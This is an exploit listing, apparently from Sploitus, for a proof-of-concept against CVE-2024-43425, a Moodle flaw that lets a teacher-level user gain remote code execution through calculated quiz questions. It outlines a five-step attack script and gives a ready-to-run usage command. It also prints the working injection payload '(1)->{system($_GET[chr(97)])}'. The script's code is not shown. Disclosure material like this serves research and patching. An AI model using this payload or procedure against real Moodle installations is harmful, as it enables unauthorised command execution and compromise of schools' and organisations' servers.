Share
## https://sploitus.com/exploit?id=8EEF1814-DDBF-5014-A74E-995999CC8B2C
# CVE-2024-43425-Poc
CVE Overview
CVE ID: CVE-2024-43425
Description: Moodle allows an authenticated teacher-level user to upload a malicious calculated question via the quiz editor interface.
Impact: Remote Code Execution (RCE)
Cause: Improper sanitization of mathematical payloads inside calculated questions, which leads to command injection through the dataset wizard.
##Requirements:
Valid login credentials
Access to quiz editing interface (usually a teacher or admin role)
Known cmid (quiz module ID) and courseid
##This script performs a 5-step attack:
Step Description
1ď¸ Fetch login token (logintoken)
2ď¸ Log in and establish a valid MoodleSession
3ď¸ Extract sesskey, ctxid, and category from the quiz edit page
4ď¸ Upload a specially crafted calculated question with an RCE payload
5ď¸ Trigger the payload through the dataset wizard page
##Usage Instructions
Requirements:
Python 3
Python libraries: requests, bs4 (BeautifulSoup)
~~~
pip3 install requests bs4
~~~
~~~
python3 exploit_cve_2024_43425.py \
--url http://192.168.2.12/moodle \
--username test \
--password 'Test@123' \
--courseid 1 \
--cmid 1 \
--cmd 'whoami'
~~~
##Payload used:
~~~
answer[0] = "(1)->{system($_GET[chr(97)])}"
~~~